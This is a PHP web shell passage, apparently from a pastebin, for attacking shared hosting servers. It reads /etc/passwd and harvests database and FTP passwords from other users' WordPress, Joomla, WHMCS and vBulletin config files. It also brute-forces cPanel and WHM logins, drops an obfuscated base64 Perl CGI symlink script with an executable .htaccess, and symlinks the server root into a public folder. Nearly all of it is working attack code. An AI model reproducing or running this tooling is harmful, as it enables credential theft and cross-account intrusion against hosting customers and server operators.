  520. $users=file("/etc/passwd");
  521. foreach($users as $user)
  522. {
  523.  
  524. $str=explode(":",$user);
  525. $usersss=$str[0];
  526.  
  527.  
  528.              
  529.                    foreach($_POST['config'] as $check)
  530.                      {
  531.  
  532. ////////////////
  533. ///wordpress////
  534. ////////////////
  535.                        if($check == "wp")
  536.                          {
  537.                            $wpc=array("..wp-config","..word-wp","..wpblog");
  538.  
  539.                         foreach($wpc as $wpcon)
  540.                           {
  541.                                $finalurl=$re.$usersss.$wpcon;
  542.                               $content=data($finalurl);
  543.                              
  544.                               if($content && preg_match('/table_prefix/i',$content))
  545.                                  {
  546.  
  547. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website cms is wordpress </font></td></tr></table>";
  548.  
  549.                                  echo "mysql server password ==> ". $dbp=entre2v2($content,"DB_PASSWORD', '","');");
  550.                                     if(!empty($dbp))
  551.                                             $pass=$dbp."\n";
  552.                                           fwrite($ffile,$pass);
  553.  
  554.                                   }
  555.  
  556.  
  557.  
  558.                           }
  559.                        
  560.                      }
  561. ////////////
  562. // joomla //  
  563. ////////////                  
  564.                      
  565.                      
  566.                      if($check == "joomla")
  567.                      {
  568.                         $joomlac=array("..joomla-or-whmcs","..joomla");
  569.                          foreach($joomlac as $joomlacon)
  570.                           {
  571.                               $finalurl=$re.$usersss.$joomlacon;
  572.                               $content=data($finalurl);
  573.                              
  574.                               if($content && preg_match('/dbprefix/i',$content))
  575.                                  {
  576.  
  577. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's  website cms is joomla </font></td></tr></table>";
  578.  
  579.                                  echo "mysql server password ==> ". $dbp=entre2v2($content,"password = '","';");
  580.                                     if(!empty($dbp))
  581.                                             $pass=$dbp."\n";
  582.                                           fwrite($ffile,$pass);
  583.  
  584.                                   }
  585.  
  586.  
  587.  
  588.                           }
  589.                          
  590.                          
  591.                          }
  592. ///////////////
  593. ////whmcs /////
  594. ///////////////  
  595.                  
  596.                           if($check == "whmcs")
  597.                          {
  598.                          $whmcsc=array("..joomla-or-whmcs","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
  599.                          foreach($whmcsc as $whmcscon)
  600.                           {
  601.                               $finalurl=$re.$usersss.$whmcscon;
  602.                               $content=data($finalurl);
  603.                              
  604.                               if($content && preg_match('/cc_encryption_hash/i',$content))
  605.                                  {
  606.  
  607. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website whmcs bhaiyu  </font></td></tr></table>";
  608.  
  609.                                  echo "mysql server password ==> ". $dbp=entre2v2($content,"db_password = '","';");
  610.                                     if(!empty($dbp))
  611.                                             $pass=$dbp."\n";
  612.                                           fwrite($ffile,$pass);
  613.  
  614.                                   }
  615.                           }
  616.                          }
  617. /////////////////
  618. ///VBulletin////
  619. ////////////////
  620.                             if($check == "vb")
  621.                          {
  622.                          $vbc=array("..vbinc","..vb");
  623.                          foreach($vbc as $vbcon)
  624.                           {
  625.                               $finalurl=$re.$usersss.$vbcon;
  626.                               $content=data($finalurl);
  627.                              
  628.                               if($content && preg_match('/admincpdir/i',$content))
  629.                                  {
  630.  
  631. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website cms is vbulletin </font></td></tr></table>";
  632.  
  633.                                  echo "mysql server password ==> ". $dbp=entre2v2($content,"password'] = '","';");
  634.                                     if(!empty($dbp))
  635.                                             $pass=$dbp."\n";
  636.                                           fwrite($ffile,$pass);
  637.  
  638.                                   }
  639.                           }
  640.                          }
  641. /////////////////
  642. ///joomla ftp////
  643. ////////////////                         
  644.                           if($check == "jftp")
  645.                      {
  646.                         $joomlac=array("..joomla-or-whmcs","..joomla");
  647.                          foreach($joomlac as $joomlacon)
  648.                           {
  649.                               $finalurl=$re.$usersss.$joomlacon;
  650.                               $content=data($finalurl);
  651.                              
  652.                               if($content && preg_match('/dbprefix/i',$content))
  653.                                  {
  654.  
  655. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's  website cms is joomla </font></td></tr></table>";
  656.  
  657.                                  $dbp=entre2v2($content,"ftp_pass = '","';");
  658.                                  $dbu=entre2v2($content,"ftp_user = '","';");
  659.                                     if(!empty($dbp))
  660.                                     echo "ftp  user is ==> ". $dbu=entre2v2($content,"ftp_user = '","';");
  661.                                     echo "<br>ftp  password is ==> ". $dbp=entre2v2($content,"ftp_pass = '","';");
  662.                                    
  663.                                             $pass=$dbu." ".$dbp."\n";
  664.                                           fwrite($ffile,$pass);
  665.  
  666.                                   }
  667.  
  668.  
  669.  
  670.                           }
  671.                          
  672.                          
  673.                          }
  674. ////////////////
  675. // other cms ///
  676. ///////////////                      
  677.                              if($check == "other")
  678.                          {
  679.                          $otherc=array("..config","..admin-conf");
  680.                          foreach($otherc as $othercon)
  681.                           {
  682.                               $finalurl=$re.$usersss.$othercon;
  683.                               $content=data($finalurl);
  684.                              
  685.                               if($content && preg_match('/DB_DATABASE/i',$content))
  686.                                  {
  687.  
  688. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss  </font></td></tr></table>";
  689.  
  690.                                  echo "mysql server password ==> ". $dbp=entre2v2($content,"DB_PASSWORD', '","');");
  691.                                     if(!empty($dbp))
  692.                                             $pass=$dbp."\n";
  693.                                           fwrite($ffile,$pass);
  694.  
  695.                                   }
  696. elseif($content && preg_match('/dbpass/i',$content))
  697. {
  698.  
  699. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  700.  
  701. echo $db=entre2v2($content,"dbpass = '","';");
  702. if(!empty($db))
  703. $pass=$db."\n";
  704. fwrite($ffile,$pass);
  705. }
  706. elseif($content && preg_match('/dbpass/i',$content))
  707. {
  708.  
  709. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss  </font></td></tr></table>";
  710.  
  711. echo $db=entre2v2($content,"dbpass = '","';");
  712. if(!empty($db))
  713. $pass=$db."\n";
  714. fwrite($ffile,$pass);
  715.  
  716. }
  717. elseif($content && preg_match('/dbpass/i',$content))
  718. {
  719.  
  720. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  721.  
  722. echo $db=entre2v2($content,"dbpass = \"","\";");
  723. if(!empty($db))
  724. $pass=$db."\n";
  725. fwrite($ffile,$pass);
  726. }
  727.                                
  728.                                  
  729.                                  
  730.                                  
  731.                           }
  732.                          }
  733.                          
  734.                          
  735.                          
  736.                  }
  737.              }
  738.               }
  739.              else{
  740.                   echo "<p>aapne pani jayada pee liya h =)), aap nashe may ho bhaiyu, please checkmark config files  ";
  741.                  }
  742.        
  743.      }
  744. ?>
  745.  
  746.  
  747.  
  748. <?php
  749. /////////////////////////////////
  750. /////   cpanel cracker    ///////
  751. /////////////////////////////////
  752. ?>
  753.  
  754.  
  755. <form method=post>
  756. <input type=submit name=cpanel value="Auto username/password loading cpanel cracker"><p>
  757. <?php
  758.  
  759. if(isset($_POST['cpanel']))
  760. {
  761. ?>
  762. <form method=post><div align=center><table>
  763. want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
  764. <option name="op" value="whm">WHMPanel</option></table><p>
  765. <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
  766. foreach($users as $user)
  767. {
  768. $str=explode(":",$user);
  769. echo $str[0]."\n";
  770. }
  771.  
  772. ?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
  773. <?php
  774.  
  775. $d=getcwd()."/P-list.txt";
  776. $pf=file($d);
  777. foreach($pf as $rt)
  778. {
  779. $str=explode('\n',$rt);
  780. echo trim($str[0])."\n";
  781. } ?></textarea><p>
  782. <input type=submit name=cpanelcracking value="Start"></form>
  783. <?php
  784. }
  785. ?>
  786.  
  787.  
  788.  
  789.  
  790. <?php
  791. error_reporting(0);
  792. $connect_timeout=5;
  793. set_time_limit(0);
  794.  
  795. $userl=$_POST['usernames'];
  796. $passl=$_POST['passwords'];
  797. $attack=$_POST['op'];
  798. $target = "localhost";
  799.  
  800. if(isset($_POST['cpanelcracking']))
  801. {
  802. if($userl!=="" && $passl!=="")
  803. {
  804. if($_POST["op"]=="cp")
  805. {
  806. $cracked=$_POST['crack'];
  807. @fopen($cracked,'a');
  808. echo "now we are attacking cpanels....please wait till the end of process \n";
  809.  
  810.  
  811. }
  812. elseif($_POST["op"]=="whm")
  813. {
  814. @fopen($cracked,'a');
  815. echo "now we are attacking WHM panel....please wait till the end of process";
  816.  
  817. }
  818.  
  819. function cpanel($host,$user,$pass,$timeout){
  820. $ch = curl_init();
  821. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  822. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  823. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  824. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  825. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  826. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  827. $data = curl_exec($ch);
  828. if ( curl_errno($ch) == 0 ){
  829. echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  830.  
  831.  
  832. }
  833.  
  834. curl_close($ch);}
  835.  
  836. $userlist=explode("\n",$userl);
  837. $passlist=explode("\n",$passl);
  838.  
  839. if ($attack == "cp")
  840. {
  841. foreach ($userlist as $user) {
  842. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
  843. $finaluser = trim($user);
  844. foreach ($passlist as $password ) {
  845. $finalpass = trim($password);
  846.  
  847.  
  848. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  849.  
  850. }
  851. }
  852.  
  853. }
  854.  
  855. function whm($host,$user,$pass,$timeout){
  856. $ch = curl_init();
  857. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  858. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  859. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  860. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  861. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  862. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  863. $data = curl_exec($ch);
  864. if ( curl_errno($ch) == 0 ){
  865. echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  866.  
  867.  
  868.  
  869.  
  870. }
  871.  
  872.  
  873. curl_close($ch);}
  874. $userlist=explode("\n",$userl);
  875. $passlist=explode("\n",$passl);
  876.  
  877. if ($attack == "whm")
  878. {
  879. foreach ($userlist as $user) {
  880. echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
  881. $finaluser = trim($user);
  882. foreach ($passlist as $password ) {
  883. $finalpass = trim($password);
  884.  
  885. whm($target,$finaluser,$finalpass,$connect_timeout);
  886. }
  887. }
  888. }
  889. }
  890. elseif($userl=="")
  891. {
  892. echo "what are you doing  :( , you have left userlist field empty";
  893.  
  894. }
  895. elseif($passl=="")
  896. {
  897.  
  898. echo "please put passwords in paasword list field";
  899. }
  900. }
  901. ?>
  902.  
  903. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms">
  904. <form method=post><font color=white size=2 face="comic sans ms">extract domain names by valiases</font><br>
  905. <input type=submit name=domain value="cat /etc/valiases/" /></form>
  906. <?php
  907.     if(isset($_POST['domain']))
  908.     {
  909.        
  910.        
  911.        
  912. $yamsites=@file("/etc/named.conf");
  913. if(!$yamsites)
  914. {
  915.     die('<script>alert("r00t@group:~# /etc/named.conf Not Found!!!")</script>');
  916. }
  917. echo "<div class=container><br /><center><font color=orange size=3 face=\"comic sans ms\">Total Domanis Found: </font><font color=red>".count($yamsites)."</font><br /><br /><table align=center border=1 width=59% cellpadding=5><tr><td>Domains</td><td>Users</td><td>Directory</font></td></tr>";
  918. foreach($yamsites as $yamprog)
  919. {
  920.     if(eregi("zone", $yamprog))
  921.     {
  922.         preg_match_all('#zone "(.*)" #', $yamprog, $yamzone);
  923.         flush();
  924.         if(strlen(trim($yamzone[1][0]))>2)
  925.         {
  926.             $user=posix_getpwuid(@fileowner("/etc/valiases/".$yamzone[1][0]));
  927.             echo "<tr><td><a href=http://www.".$yamzone[1][0]." target=_blank>".$yamzone[1][0]."</a><td>".$user['name']."
  928.            </td><td><a href=/group.txt/root/home/".$user['name']."/public_html/ target=_blank>SymLink</a></td></tr>";
  929.             flush();
  930.         }
  931.     }
  932. }
  933. echo '</table></div></body>';
  934.  
  935.        
  936.        
  937.        
  938.         }
  939.    
  940.    
  941.    
  942.     ?>
  943.  
  944. <div align=center><table width=100% border=1><tr><td align=center></td></tr></table>
  945.  
  946. <font color=white size=4 face="comic sans ms">Perl based symlink ;)<br><form method=post>
  947.     <input type=submit name=passx value="cat /etc/passwd"><p></form>
  948.     <?php
  949. if(isset($_POST['passx']))
  950. {
  951.     ?>
  952. <textarea style="background:black;color:white" rows=20 cols=50 name=usernames  ><?php  $users=file("/etc/passwd");
  953. foreach($users as $user)
  954. {
  955. $str=explode("\n",$user);
  956. echo $str[0]."\n";
  957. }
  958.  
  959. ?></textarea>
  960. <?php
  961. }
  962.  
  963.  
  964.  
  965. ?>
  966.  
  967.    
  968.     <form method=post>
  969.  
  970.     <font size=5 color=white>==[[ <input type=submit name=perl value="Perl based  ln -s \m/"> ]]==</font></form>
  971.     <p>
  972.  
  973.    
  974.    
  975.    
  976.    
  977.     <?php
  978. if(isset($_POST['perl']))
  979. {
  980.     error_reporting(0);
  981.  
  982. $da='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';
  983. $decryp=gzinflate(base64_decode($da));
  984. mkdir('perl', 0777);
  985. $hope = fopen("perl/.htaccess", 'w');
  986. $hcon= "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .root\nAddHandler cgi-script .root\nAddHandler cgi-script .root";
  987. fwrite ( $hope, $hcon ) ;
  988. $pelfile = fopen("perl/in.root" ,"w");
  989. fwrite ($pelfile,$decryp);
  990.     chmod("perl/in.root",0755);
  991.    echo "<iframe src=perl/in.root width=50% height=70% ></iframe><br><br> ";
  992.    echo "<font size=4>check in this directory for configuration files once you have done with this script<br><a href=perl/><u>yahaan Group-XP yahaan :)</u></a></font>";
  993.  
  994. }
  995. ?>
  996. <table width=100% border=1><tr><td align=center></td></tr></table>
  997. <font color=#00ff00 size=4>==[[ Cant read /etc/named.conf bypasser ]]==</font>
  998.  
  999. <form method=post>
  1000.     <input type=submit name="ms" value="What are you waiting for " /></form>
  1001.    
  1002.    
  1003.     <?php
  1004.     if(isset($_POST['ms']))
  1005.     {
  1006.         error_reporting(0);
  1007.         $cmd="ls /var/named";
  1008.         $r=shell_exec($cmd);
  1009.        
  1010.  
  1011.         mkdir('groupshell',0777);
  1012.  
  1013.  
  1014.  
  1015.  
  1016. $rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1017. $f = fopen('groupshell/.htaccess','w');
  1018.  
  1019. $groupshell = symlink("/","groupshell/root");
  1020.  
  1021. fwrite($f , $rr);
  1022.         ?><form method=post><textarea rows=1 cols=1 name=web><?php echo $r;?></textarea><br><input type=submit name=w value="one more time bhaiyu ^_^ " />
  1023.         </form>
  1024.         <?php
  1025.        
  1026.         }
  1027.    
  1028. error_reporting(0);
  1029. $webs=explode("\n",$_POST['web']);
  1030. if(isset($_POST['w']))
  1031. {
  1032. $webs=explode("\n",$_POST['web']);
  1033. echo "<table width=40% align=center border=1>
  1034. <tr><td align=center>Websites</td><td align=center>usernames</td><td>symlink</td></tr>";
  1035. foreach($webs as $f)
  1036. {
  1037.     $str=substr_replace($f,"",-4);
  1038.    
  1039.  
  1040. $user = posix_getpwuid(@fileowner("/etc/valiases/".$str));
  1041.  
  1042. echo "<table border=1 width=40%><tr><td align=center><font color=red>".$str."</font></td><td align=center><font color=white>".$user['name']."</td><td><a href=groupshell/root/home/".$user['name']."/public_html/>spin the shit </a></tr></table>"; flush();
  1043.  
  1044.  
  1045.    
  1046.    
  1047.    
  1048.     }  
  1049.    
  1050.     }
  1051.  
  1052.  
  1053. ?>
Add Comment
Please, Sign In to add comment